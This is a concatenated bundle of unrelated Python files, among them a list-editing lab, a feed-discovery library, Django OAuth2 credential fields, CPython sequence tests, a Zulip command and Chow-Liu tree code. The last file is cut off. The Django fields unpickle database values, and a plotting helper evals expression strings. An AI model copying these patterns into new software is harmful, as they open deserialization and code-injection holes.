#Ask the user for a fruit to delete and find it and delete it.
fruit_remove = input("Enter a Fruit to remove: ")
fruit.remove(fruit_remove)
print(fruit)
"""Part 3 of Lab"""
#Ask the user for input displaying a line like "Do you like apples?"
#for each fruit in the list (making the fruit all lowercase).
#For each "no", delete that fruit from the list.
#For any answer that is not "yes" or "no", prompt the user to answer
#with one of those two values (a while loop is good here):
for item in fruit[:]:
    answer = input("Do you like " + item.lower() + "? (yes/no): ")
    while answer not in ('yes', 'no'):
        answer = input("Please answer yes or no: ")
    if answer == 'no':
        fruit.remove(item)
#Display the list.
print(fruit)
|
# -*- coding: utf-8 -*-
# Copyright 2010 Mark Lee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''\
An autodiscovery library.
.. moduleauthor:: Mark Lee <cardisco lazymalevolence com>
'''
import html5lib
import httplib2
from importlib import import_module
MODULES = {
'application/atom+xml': '.atom',
'application/rss+xml': '.rss',
'application/rdf+xml': '.rdf',
'application/opensearchdescription+xml': '.opensearch',
}
_MODULE_CACHE = {}
HTTP_ACCEPT = '%s, text/html, text/*; q=0.5' % ', '.join(MODULES.keys())
def discover(url, http=None, **kwargs):
'''Discovers various metadata URLs embedded in an HTML document, such
as feeds and RDF.
:param str url: The URL to retrieve the HTML document from.
:param http: The :mod:`httplib2` HTTP object. If it's not set, one will
be created.
:type http: :class:`httplib2.Http` or :const:`None`
:param dict \*\*kwargs: Extra arguments to :meth:`httplib2.Http.request`.
:returns: A dictionary, where the key is the URL's MIME type and the value
is a dictionary of URL-title pairs.
:rtype: :class:`dict`
'''
if not http:
http = httplib2.Http()
if 'headers' in kwargs:
kwargs['headers']['Accept'] = HTTP_ACCEPT
else:
kwargs['headers'] = {
'Accept': HTTP_ACCEPT,
}
response, content = http.request(url, **kwargs)
if response['content-type'] in MODULES:
# assume the server's not lying
return {
            response['content-type']: {
url: None,
},
}
# TODO if someone wishes to, they can implement the MIME sniffing
# algorithm here.
return parse_html(content, url=url)
def parse_html(file_obj_or_str, url=None):
'''Discovers various metadata URLs embedded in a given HTML document, such
as feeds and RDF.
:param file_obj_or_str: The HTML document to be parsed.
:type file_obj_or_str: a file-like object or :class:`str`
:param url: The URL that the HTML document was retrieved from.
:type url: :class:`str` or :const:`None`
:returns: A dictionary, where the key is the URL's MIME type and the value
is a dictionary of URL-title pairs.
:rtype: :class:`dict`
'''
urls = {}
# load the modules only when the function is first called.
if not _MODULE_CACHE:
for name, module in MODULES.iteritems():
mod = import_module(module, package=__name__)
try:
_MODULE_CACHE[name] = mod.Discoverer
except AttributeError:
raise AttributeError('''\
Could not find a Discoverer object in the %s module.''' % name)
doc = html5lib.parse(file_obj_or_str, treebuilder='lxml')
for name, discoverer in _MODULE_CACHE.iteritems():
urls[name] = discoverer.parse(doc, url=url)
return urls
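# A usage sketch (assumes network access and that the submodules listed in
# MODULES are importable next to this one):
#
#     found = discover('http://example.com/')
#     for mime_type, links in found.iteritems():
#         for link, title in links.iteritems():
#             print '%s: %s (%s)' % (mime_type, link, title)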
|
import math
def funct_if(test,var_true,var_false):
if (test):
return var_true
else:
return var_false
def scale(var_old_min, var_old_max, var_new_min, var_new_max, var_value):
OldSRange = (var_old_max - var_old_min)
NewSRange = (var_new_max - var_new_min)
return (((var_value - var_old_min) * NewSRange) / OldSRange) + var_new_min
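# Example: scale() maps a value linearly from one range onto another, e.g. a
# pixel column in [0, 800] onto an x coordinate in [-10, 10]:
#     scale(0, 800, -10, 10, 400)  # -> 0.0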
def is_even(value_to_test):
return value_to_test % 2 == 0
def draw_funct(dfunction, dxmin, dxmax, dymin, dymax, resolution):
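    # Note: this function depends on globals supplied by the host environment
    # (x, y, canvas_width, canvas_height) and evaluates the string `dfunction`
    # as a Python expression of `dx`, returning 255 where the curve crosses the
    # current pixel row and 0 elsewhere.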
dx = scale(0,canvas_width,dxmin,dxmax,x)
cdy = eval(dfunction)
dx = scale(0,canvas_width,dxmin,dxmax,x-resolution)
pdy = eval(dfunction)
dx = scale(0,canvas_width,dxmin,dxmax,x+resolution)
ndy = eval(dfunction)
cdsy = canvas_height - scale(dymin,dymax,0,canvas_height,cdy)
pdsy = canvas_height - scale(dymin,dymax,0,canvas_height,pdy)
ndsy = canvas_height - scale(dymin,dymax,0,canvas_height,ndy)
dyval = scale(0,canvas_height,dymin,dymax,y)
py = scale(dymin,dymax,0,canvas_height,dyval-resolution)
ny = scale(dymin,dymax,0,canvas_height,dyval+resolution)
#if y - cdsy > py - pdsy and y - cdsy < ny - ndsy:
#if (cdsy - y < pdsy - y and cdsy - y > ndsy - y) or (cdsy - y > pdsy - y and cdsy - y < ndsy - y):
if (0 < pdsy - y and 0 > ndsy - y) or (0 > pdsy - y and 0 < ndsy - y) or round(cdsy - y) == 0:
# print("dx: " + str(dx) + " , dy: " + str(dy))
# if y - dsy < resolution + 1 and y - dsy > 0-(resolution + 1): #round(dsy) == y:
return 255
else:
return 0
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 utilities for Django.
Utilities for using OAuth 2.0 in conjunction with
the Django datastore.
"""
import oauth2client
import base64
import pickle
from django.db import models
from oauth2client.client import Storage as BaseStorage
class CredentialsField(models.Field):
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Credentials):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
class FlowField(models.Field):
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(FlowField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Flow):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
class Storage(BaseStorage):
"""Store and retrieve a single credential to and from
the datastore.
This Storage helper presumes the Credentials
    have been stored as a CredentialsField
on a db model class.
"""
def __init__(self, model_class, key_name, key_value, property_name):
"""Constructor for Storage.
Args:
          model_class: db.Model, model class for the entity that holds the credentials
key_name: string, key name for the entity that has the credentials
key_value: string, key value for the entity that has the credentials
          property_name: string, name of the property that is a CredentialsField
"""
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credential = None
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query)
if len(entities) > 0:
credential = getattr(entities[0], self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
def locked_put(self, credentials):
"""Write a Credentials to the datastore.
Args:
credentials: Credentials, the credentials to store.
"""
args = {self.key_name: self.key_value}
entity = self.model_class(**args)
setattr(entity, self.property_name, credentials)
entity.save()
def locked_delete(self):
"""Delete Credentials from the datastore."""
query = {self.key_name: self.key_value}
        self.model_class.objects.filter(**query).delete()
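# A minimal usage sketch (assumes a hypothetical CredentialsModel with a
# user key field and a CredentialsField named `credential`):
#
#     storage = Storage(CredentialsModel, 'id', user, 'credential')
#     credential = storage.get()
#     if credential is None or credential.invalid:
#         ...  # run the OAuth 2.0 flow, then storage.put(credential)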
|
from astropy import table
from astropy import log
import numpy as np
def flag_dendro(dend, catalog=None, smooth=False, pixels_with_bad=[],
colname='IsNotH2CO', flag_descendants=True):
"""
Remove / flag as "bad" objects in the dendrogram that are not H2CO
This was done manually; there is now (Jan 17, 2015) an automated approach
in dendro_temperature
"""
if catalog is not None and colname not in catalog.colnames:
catalog.add_column(table.Column(name=colname, dtype=bool,
data=np.zeros(len(catalog),
dtype='bool')))
for obj in dend:
obj.bad = False
for x,y,z in pixels_with_bad:
z = z-64 # Jan 25: the cubes were shifted
if z < 0: continue
bad_obj = dend.structure_at([z/(2 if smooth else 1),y,x])
if bad_obj and flag_descendants:
bad_obj = bad_obj.ancestor
bad_obj.bad = True
if catalog is not None:
catalog[bad_obj.idx][colname] = True
for obj in bad_obj.descendants:
obj.bad = True
catalog[obj.idx][colname] = True
elif bad_obj:
obj = bad_obj
            # flag the ancestors, but not the ancestors' parents
while obj:
obj.bad = True
if catalog is not None:
catalog[obj.idx][colname] = True
obj = obj.parent
else:
# sometimes these don't get IDd?
pass
def flag_hc3n(dend, catalog, smooth):
pixels_with_bad = [(518,122,142),
(508,123,10),
(533,124,48),
(857,103,126),
(904,102,105),
(884,95,118),
(515, 108, 1),
]
flag_dendro(dend, catalog, smooth, pixels_with_bad=pixels_with_bad,
colname='IsNotH2CO')
# This should not happen, but can if the table was read manually:
# the table reads true/false as strings:
# https://github.com/astropy/astropy/issues/2974
if issubclass(catalog['IsNotH2CO'].dtype.type, str):
col = catalog['IsNotH2CO']
catalog.remove_column('IsNotH2CO')
catalog.add_column(table.Column(name='IsNotH2CO',
dtype='bool',
data=col=='True'))
log.info("Flagged {0} dendrogram objects as HC3N".format(catalog['IsNotH2CO'].sum()))
def flag_absorption(dend, catalog=None, smooth=False):
"""
Flag out things associated with absorption in one or both of the Sgr B2
lines
"""
# add 64 because I got these from the post-Jan25 cubes
pixels_with_bad = [(511,124,221+64),
(512,124,181+64),
(516,125,218+64),
(517,121,197+64),
(515,120,240+64),
]
flag_dendro(dend, catalog, smooth, pixels_with_bad=pixels_with_bad,
colname='IsAbsorption', flag_descendants=False)
if issubclass(catalog['IsAbsorption'].dtype.type, str):
col = catalog['IsAbsorption']
catalog.remove_column('IsAbsorption')
catalog.add_column(table.Column(name='IsAbsorption',
dtype='bool',
data=col=='True'))
log.info("Flagged {0} dendrogram objects as Absorption".format(catalog['IsAbsorption'].sum()))
|
"""
Tests common to tuple, list and UserList.UserList
"""
import unittest
import sys
import pickle
# Various iterables
# This is used for checking the constructor (here and in test_deque.py)
def iterfunc(seqn):
'Regular generator'
for i in seqn:
yield i
class Sequence:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class IterFunc:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class IterGen:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class IterNextOnly:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class IterNoNext:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class IterGenExc:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class IterFuncStop:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
from itertools import chain
def itermulti(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, iterfunc(IterGen(Sequence(seqn)))))
class CommonTest(unittest.TestCase):
# The type to be tested
type2test = None
def test_constructors(self):
l0 = []
l1 = [0]
l2 = [0, 1]
u = self.type2test()
u0 = self.type2test(l0)
u1 = self.type2test(l1)
u2 = self.type2test(l2)
uu = self.type2test(u)
uu0 = self.type2test(u0)
uu1 = self.type2test(u1)
uu2 = self.type2test(u2)
v = self.type2test(tuple(u))
class OtherSeq:
def __init__(self, initseq):
self.__data = initseq
def __len__(self):
return len(self.__data)
def __getitem__(self, i):
return self.__data[i]
s = OtherSeq(u0)
v0 = self.type2test(s)
self.assertEqual(len(v0), len(s))
s = "this is also a sequence"
vv = self.type2test(s)
self.assertEqual(len(vv), len(s))
        # Create from various iterables
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (Sequence, IterFunc, IterGen,
itermulti, iterfunc):
self.assertEqual(self.type2test(g(s)), self.type2test(s))
self.assertEqual(self.type2test(IterFuncStop(s)), self.type2test())
self.assertEqual(self.type2test(c for c in "123"), self.type2test("123"))
self.assertRaises(TypeError, self.type2test, IterNextOnly(s))
self.assertRaises(TypeError, self.type2test, IterNoNext(s))
self.assertRaises(ZeroDivisionError, self.type2test, IterGenExc(s))
def test_truth(self):
self.assertFalse(self.type2test())
self.assertTrue(self.type2test([42]))
def test_getitem(self):
u = self.type2test([0, 1, 2, 3, 4])
for i in range(len(u)):
self.assertEqual(u[i], i)
self.assertEqual(u[int(i)], i)
for i in range(-len(u), -1):
self.assertEqual(u[i], len(u)+i)
self.assertEqual(u[int(i)], len(u)+i)
self.assertRaises(IndexError, u.__getitem__, -len(u)-1)
self.assertRaises(IndexError, u.__getitem__, len(u))
self.assertRaises(ValueError, u.__getitem__, slice(0,10,0))
u = self.type2test()
self.assertRaises(IndexError, u.__getitem__, 0)
self.assertRaises(IndexError, u.__getitem__, -1)
self.assertRaises(TypeError, u.__getitem__)
a = self.type2test([10, 11])
self.assertEqual(a[0], 10)
self.assertEqual(a[1], 11)
self.assertEqual(a[-2], 10)
self.assertEqual(a[-1], 11)
self.assertRaises(IndexError, a.__getitem__, -3)
self.assertRaises(IndexError, a.__getitem__, 3)
def test_getslice(self):
l = [0, 1, 2, 3, 4]
u = self.type2test(l)
self.assertEqual(u[0:0], self.type2test())
self.assertEqual(u[1:2], self.type2test([1]))
self.assertEqual(u[-2:-1], self.type2test([3]))
self.assertEqual(u[-1000:1000], u)
self.assertEqual(u[1000:-1000], self.type2test([]))
self.assertEqual(u[:], u)
self.assertEqual(u[1:None], self.type2test([1, 2, 3, 4]))
self.assertEqual(u[None:3], self.type2test([0, 1, 2]))
# Extended slices
self.assertEqual(u[::], u)
self.assertEqual(u[::2], self.type2test([0, 2, 4]))
self.assertEqual(u[1::2], self.type2test([1, 3]))
self.assertEqual(u[::-1], self.type2test([4, 3, 2, 1, 0]))
self.assertEqual(u[::-2], self.type2test([4, 2, 0]))
self.assertEqual(u[3::-2], self.type2test([3, 1]))
self.assertEqual(u[3:3:-2], self.type2test([]))
self.assertEqual(u[3:2:-2], self.type2test([3]))
self.assertEqual(u[3:1:-2], self.type2test([3]))
self.assertEqual(u[3:0:-2], self.type2test([3, 1]))
self.assertEqual(u[::-100], self.type2test([4]))
self.assertEqual(u[100:-100:], self.type2test([]))
self.assertEqual(u[-100:100:], u)
self.assertEqual(u[100:-100:-1], u[::-1])
self.assertEqual(u[-100:100:-1], self.type2test([]))
self.assertEqual(u[-100:100:2], self.type2test([0, 2, 4]))
# Test extreme cases with long ints
a = self.type2test([0,1,2,3,4])
self.assertEqual(a[ -pow(2,128): 3 ], self.type2test([0,1,2]))
self.assertEqual(a[ 3: pow(2,145) ], self.type2test([3,4]))
def test_contains(self):
u = self.type2test([0, 1, 2])
for i in u:
self.assertIn(i, u)
for i in min(u)-1, max(u)+1:
self.assertNotIn(i, u)
self.assertRaises(TypeError, u.__contains__)
def test_contains_fake(self):
class AllEq:
# Sequences must use rich comparison against each item
# (unless "is" is true, or an earlier item answered)
# So instances of AllEq must be found in all non-empty sequences.
def __eq__(self, other):
return True
__hash__ = None # Can't meet hash invariant requirements
self.assertNotIn(AllEq(), self.type2test([]))
self.assertIn(AllEq(), self.type2test([1]))
def test_contains_order(self):
# Sequences must test in-order. If a rich comparison has side
# effects, these will be visible to tests against later members.
# In this test, the "side effect" is a short-circuiting raise.
class DoNotTestEq(Exception):
pass
class StopCompares:
def __eq__(self, other):
raise DoNotTestEq
checkfirst = self.type2test([1, StopCompares()])
self.assertIn(1, checkfirst)
checklast = self.type2test([StopCompares(), 1])
self.assertRaises(DoNotTestEq, checklast.__contains__, 1)
def test_len(self):
self.assertEqual(len(self.type2test()), 0)
self.assertEqual(len(self.type2test([])), 0)
self.assertEqual(len(self.type2test([0])), 1)
self.assertEqual(len(self.type2test([0, 1, 2])), 3)
def test_minmax(self):
u = self.type2test([0, 1, 2])
self.assertEqual(min(u), 0)
self.assertEqual(max(u), 2)
def test_addmul(self):
u1 = self.type2test([0])
u2 = self.type2test([0, 1])
self.assertEqual(u1, u1 + self.type2test())
self.assertEqual(u1, self.type2test() + u1)
self.assertEqual(u1 + self.type2test([1]), u2)
self.assertEqual(self.type2test([-1]) + u1, self.type2test([-1, 0]))
self.assertEqual(self.type2test(), u2*0)
self.assertEqual(self.type2test(), 0*u2)
self.assertEqual(self.type2test(), u2*0)
self.assertEqual(self.type2test(), 0*u2)
self.assertEqual(u2, u2*1)
self.assertEqual(u2, 1*u2)
self.assertEqual(u2, u2*1)
self.assertEqual(u2, 1*u2)
self.assertEqual(u2+u2, u2*2)
self.assertEqual(u2+u2, 2*u2)
self.assertEqual(u2+u2, u2*2)
self.assertEqual(u2+u2, 2*u2)
self.assertEqual(u2+u2+u2, u2*3)
self.assertEqual(u2+u2+u2, 3*u2)
class subclass(self.type2test):
pass
u3 = subclass([0, 1])
self.assertEqual(u3, u3*1)
self.assertIsNot(u3, u3*1)
def test_iadd(self):
u = self.type2test([0, 1])
u += self.type2test()
self.assertEqual(u, self.type2test([0, 1]))
u += self.type2test([2, 3])
self.assertEqual(u, self.type2test([0, 1, 2, 3]))
u += self.type2test([4, 5])
self.assertEqual(u, self.type2test([0, 1, 2, 3, 4, 5]))
u = self.type2test("spam")
u += self.type2test("eggs")
self.assertEqual(u, self.type2test("spameggs"))
def test_imul(self):
u = self.type2test([0, 1])
u *= 3
self.assertEqual(u, self.type2test([0, 1, 0, 1, 0, 1]))
def test_getitemoverwriteiter(self):
# Verify that __getitem__ overrides are not recognized by __iter__
class T(self.type2test):
def __getitem__(self, key):
return str(key) + '!!!'
self.assertEqual(next(iter(T((1,2)))), 1)
def test_repeat(self):
for m in range(4):
s = tuple(range(m))
for n in range(-3, 5):
self.assertEqual(self.type2test(s*n), self.type2test(s)*n)
self.assertEqual(self.type2test(s)*(-4), self.type2test([]))
self.assertEqual(id(s), id(s*1))
def test_bigrepeat(self):
import sys
if sys.maxsize <= 2147483647:
x = self.type2test([0])
x *= 2**16
self.assertRaises(MemoryError, x.__mul__, 2**16)
if hasattr(x, '__imul__'):
self.assertRaises(MemoryError, x.__imul__, 2**16)
def test_subscript(self):
a = self.type2test([10, 11])
self.assertEqual(a.__getitem__(0), 10)
self.assertEqual(a.__getitem__(1), 11)
self.assertEqual(a.__getitem__(-2), 10)
self.assertEqual(a.__getitem__(-1), 11)
self.assertRaises(IndexError, a.__getitem__, -3)
self.assertRaises(IndexError, a.__getitem__, 3)
self.assertEqual(a.__getitem__(slice(0,1)), self.type2test([10]))
self.assertEqual(a.__getitem__(slice(1,2)), self.type2test([11]))
self.assertEqual(a.__getitem__(slice(0,2)), self.type2test([10, 11]))
self.assertEqual(a.__getitem__(slice(0,3)), self.type2test([10, 11]))
self.assertEqual(a.__getitem__(slice(3,5)), self.type2test([]))
self.assertRaises(ValueError, a.__getitem__, slice(0, 10, 0))
self.assertRaises(TypeError, a.__getitem__, 'x')
def test_count(self):
a = self.type2test([0, 1, 2])*3
self.assertEqual(a.count(0), 3)
self.assertEqual(a.count(1), 3)
self.assertEqual(a.count(3), 0)
self.assertRaises(TypeError, a.count)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
self.assertRaises(BadExc, a.count, BadCmp())
def test_index(self):
u = self.type2test([0, 1])
self.assertEqual(u.index(0), 0)
self.assertEqual(u.index(1), 1)
self.assertRaises(ValueError, u.index, 2)
u = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(u.count(0), 2)
self.assertEqual(u.index(0), 2)
self.assertEqual(u.index(0, 2), 2)
self.assertEqual(u.index(-2, -10), 0)
self.assertEqual(u.index(0, 3), 3)
self.assertEqual(u.index(0, 3, 4), 3)
self.assertRaises(ValueError, u.index, 2, 0, -10)
self.assertRaises(TypeError, u.index)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
a = self.type2test([0, 1, 2, 3])
self.assertRaises(BadExc, a.index, BadCmp())
a = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(a.index(0), 2)
self.assertEqual(a.index(0, 2), 2)
self.assertEqual(a.index(0, -4), 2)
self.assertEqual(a.index(-2, -10), 0)
self.assertEqual(a.index(0, 3), 3)
self.assertEqual(a.index(0, -3), 3)
self.assertEqual(a.index(0, 3, 4), 3)
self.assertEqual(a.index(0, -3, -2), 3)
self.assertEqual(a.index(0, -4*sys.maxsize, 4*sys.maxsize), 2)
self.assertRaises(ValueError, a.index, 0, 4*sys.maxsize,-4*sys.maxsize)
self.assertRaises(ValueError, a.index, 2, 0, -10)
def test_pickle(self):
lst = self.type2test([4, 5, 6, 7])
lst2 = pickle.loads(pickle.dumps(lst))
self.assertEqual(lst2, lst)
self.assertNotEqual(id(lst2), id(lst))
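# CommonTest is not run directly; concrete test modules subclass it and set
# `type2test`, e.g. (sketch):
#
#     class TupleTest(CommonTest):
#         type2test = tuple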
|
import logging
from argparse import ArgumentParser
from typing import Any, List, Optional
from django.db import connection
from zerver.lib.fix_unreads import fix
from zerver.lib.management import CommandError, ZulipBaseCommand
from zerver.models import Realm, UserProfile
logging.getLogger("zulip.fix_unreads").setLevel(logging.INFO)
class Command(ZulipBaseCommand):
help = """Fix problems related to unread counts."""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument(
"emails", metavar="<emails>", nargs="*", help="email address to spelunk"
)
parser.add_argument("--all", action="store_true", help="fix all users in specified realm")
self.add_realm_args(parser)
def fix_all_users(self, realm: Realm) -> None:
user_profiles = list(
UserProfile.objects.filter(
realm=realm,
is_bot=False,
)
)
for user_profile in user_profiles:
fix(user_profile)
connection.commit()
def fix_emails(self, realm: Optional[Realm], emails: List[str]) -> None:
for email in emails:
try:
user_profile = self.get_user(email, realm)
except CommandError:
print(f"e-mail {email} doesn't exist in the realm {realm}, skipping")
return
fix(user_profile)
connection.commit()
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
if options["all"]:
if realm is None:
raise CommandError("You must specify a realm if you choose the --all option.")
self.fix_all_users(realm)
return
self.fix_emails(realm, options["emails"])
|
#
# Copyright John Reid 2011
#
"""
Chow-Liu Trees
==============
`Chow-Liu trees`_ were originally defined in Chow, C. K.; Liu, C. N. (1968),
"Approximating discrete probability distributions with dependence trees",
IEEE Transactions on Information Theory IT-14 (3): 462-467.
.. _Chow-Liu trees: http://en.wikipedia.org/wiki/Chow-Liu_tree
In this module, each data point is represented as a sequence of discrete-valued features. For example, suppose we have data, X = {x},
where each x has n=4 features.
>>> X = [
... 'AACC',
... 'AAGC',
... 'AAGC',
... 'GCTC',
... 'ACTC',
... ]
>>> n = len(X[0])
We can calculate the marginal distribution of each feature
>>> import pybool.chow_liu_trees as CLT
>>> for u in xrange(n):
... print CLT.marginal_distribution(X, u)
defaultdict(<type 'float'>, {'A': 0.80000000000000004, 'G': 0.20000000000000001})
defaultdict(<type 'float'>, {'A': 0.60000000000000009, 'C': 0.40000000000000002})
defaultdict(<type 'float'>, {'C': 0.20000000000000001, 'T': 0.40000000000000002, 'G': 0.40000000000000002})
defaultdict(<type 'float'>, {'C': 1.0})
and also the marginal distribution of a pair of features
>>> print CLT.marginal_pair_distribution(X, 0, 1)
defaultdict(<type 'float'>, {('A', 'A'): 0.60000000000000009, ('G', 'C'): 0.20000000000000001, ('A', 'C'): 0.20000000000000001})
>>> print CLT.marginal_pair_distribution(X, 1, 2)
defaultdict(<type 'float'>, {('A', 'G'): 0.40000000000000002, ('C', 'T'): 0.40000000000000002, ('A', 'C'): 0.20000000000000001})
We can calculate the mutual information between all pairs of features
>>> for v in xrange(n):
... for u in xrange(v):
... print u, v, CLT.calculate_mutual_information(X, u, v)
0 1 0.223143551314
0 2 0.223143551314
1 2 0.673011667009
0 3 0.0
1 3 0.0
2 3 0.0
Finally we can build a Chow-Liu tree
>>> T = CLT.build_chow_liu_tree(X, n)
>>> print T.edges(data=True)
[(0, 1, {'weight': -0.22314355131420974}), (0, 3, {'weight': -0}), (1, 2, {'weight': -0.6730116670092563})]
"""
import numpy as N, networkx as nx
from collections import defaultdict
def marginal_distribution(X, u):
"""
    Return the marginal distribution for the u'th feature of the data points, X.
"""
values = defaultdict(float)
s = 1. / len(X)
for x in X:
values[x[u]] += s
return values
def marginal_pair_distribution(X, u, v):
"""
Return the marginal distribution for the u'th and v'th features of the data points, X.
"""
if u > v:
u, v = v, u
values = defaultdict(float)
s = 1. / len(X)
for x in X:
values[(x[u], x[v])] += s
return values
def calculate_mutual_information(X, u, v):
"""
X are the data points.
u and v are the indices of the features to calculate the mutual information for.
"""
if u > v:
u, v = v, u
marginal_u = marginal_distribution(X, u)
marginal_v = marginal_distribution(X, v)
marginal_uv = marginal_pair_distribution(X, u, v)
I = 0.
for x_u, p_x_u in marginal_u.iteritems():
for x_v, p_x_v in marginal_v.iteritems():
if (x_u, x_v) in marginal_uv:
p_x_uv = marginal_uv[(x_u, x_v)]
I += p_x_uv * (N.log(p_x_uv) - N.log(p_x_u) - N.log(p_x_v))
return I
def build_chow_liu_tree(X, n):
"""
Build a Chow-Liu tree from the data, X. n is the number of features. The weight on each edge is
the negative of the mutual information between those features. The tree is returned as a networkx
object.
"""
G = nx.Graph()
for v in xrange(n):
G.add_node(v)
for u in xrange(v):
G.add_edge(u, v, weight=-calculate_mutual_information(X, u, v))
T = nx.minimum_spanning_tree(G)
return T
if '__main__' == __name__:
import doctest
doctest.testmod()
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from tornado.web import authenticated, HTTPError
from qiita_ware.util import stats_from_df
from qiita_db.study import Study
from qiita_db.metadata_template import SampleTemplate, PrepTemplate
from qiita_db.exceptions import QiitaDBUnknownIDError
from qiita_pet.handlers.base_handlers import BaseHandler
from qiita_core.util import execute_as_transaction
class MetadataSummaryHandler(BaseHandler):
def _get_template(self, constructor, template_id):
"""Given the id and the template constructor, instantiates the template
Parameters
----------
constructor : {PrepTemplate or SampleTemplate}
The template constructor
template_id : str or int
The template id
Returns
-------
PrepTemplate or SampleTemplate instance
The instantiated object
Raises
------
HTTPError
            If the template does not exist
"""
try:
template = constructor(int(template_id))
except (QiitaDBUnknownIDError, ValueError):
# By using __name__, it will either display 'SampleTemplate'
# or 'PrepTemplate'
raise HTTPError(500, "%s %s does not exist" %
(constructor.__name__, template_id))
return template
@authenticated
@execute_as_transaction
def get(self, arguments):
study_id = int(self.get_argument('study_id'))
# Get the arguments
prep_template = self.get_argument('prep_template', None)
sample_template = self.get_argument('sample_template', None)
if prep_template and sample_template:
raise HTTPError(500, "You should provide either a sample template "
"or a prep template, but not both")
elif prep_template:
# The prep template has been provided
template = self._get_template(PrepTemplate, prep_template)
back_button_path = (
"/study/description/%s?top_tab=prep_template_tab&sub_tab=%s"
% (study_id, template.id))
elif sample_template:
# The sample template has been provided
template = self._get_template(SampleTemplate, sample_template)
back_button_path = (
"/study/description/%s"
% study_id)
else:
            # Neither a sample template nor a prep template has been provided
# Fail nicely
raise HTTPError(500, "You should provide either a sample template "
"or a prep template")
study = Study(template.study_id)
# check whether or not the user has access to the requested information
if not study.has_access(self.current_user):
raise HTTPError(403, "You do not have access to access this "
"information.")
df = template.to_dataframe()
num_samples = df.shape[0]
stats = stats_from_df(df)
self.render('metadata_summary.html',
study_title=study.title, stats=stats,
num_samples=num_samples, back_button_path=back_button_path)
|
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from oslo_log import log as logging
import oslo_messaging
from glance.common import utils
from glance.search.plugins import base
LOG = logging.getLogger(__name__)
class MetadefHandler(base.NotificationBase):
def __init__(self, *args, **kwargs):
super(MetadefHandler, self).__init__(*args, **kwargs)
self.namespace_delete_keys = ['deleted_at', 'deleted', 'created_at',
'updated_at', 'namespace_old']
self.property_delete_keys = ['deleted', 'deleted_at',
'name_old', 'namespace', 'name']
def process(self, ctxt, publisher_id, event_type, payload, metadata):
try:
actions = {
"metadef_namespace.create": self.create_ns,
"metadef_namespace.update": self.update_ns,
"metadef_namespace.delete": self.delete_ns,
"metadef_object.create": self.create_obj,
"metadef_object.update": self.update_obj,
"metadef_object.delete": self.delete_obj,
"metadef_property.create": self.create_prop,
